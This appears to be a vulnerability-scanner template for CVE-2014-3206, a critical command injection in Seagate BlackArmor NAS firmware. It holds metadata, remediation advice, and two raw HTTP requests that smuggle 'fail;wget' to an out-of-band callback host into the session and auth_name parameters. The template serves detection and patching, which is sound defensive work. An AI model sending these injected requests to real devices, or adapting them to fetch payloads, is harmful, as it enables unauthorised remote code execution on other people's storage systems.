id: CVE-2014-3206 info: name: Seagate BlackArmor NAS - Command Injection author: gy741 severity: critical description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. remediation: | Apply the latest firmware update provided by Seagate to patch the command injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-3206 - https://www.exploit-db.com/exploits/33159 - https://www.exploit-db.com/exploits/33159/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2014-3206 cwe-id: CWE-20 epss-score: 0.54379 epss-percentile: 0.9724 cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 vendor: seagate product: blackarmor_nas_220_firmware tags: cve,cve2014,seagate,rce,edb http: - raw: - | GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} Accept: */* - | GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} Accept: */* unsafe: true matchers: - type: word part: interactsh_protocol words: - "http" # digest: 4b0a00483046022100826846564ba536788f18a4b704fef2b5116bcf5b69e389303e9821902244bd2602210093f708dfa5635edfb0acea37fa9833d9011ba2feb0d7cde944994c2a282e2580:922c64590222798bb761d5b6d8e72950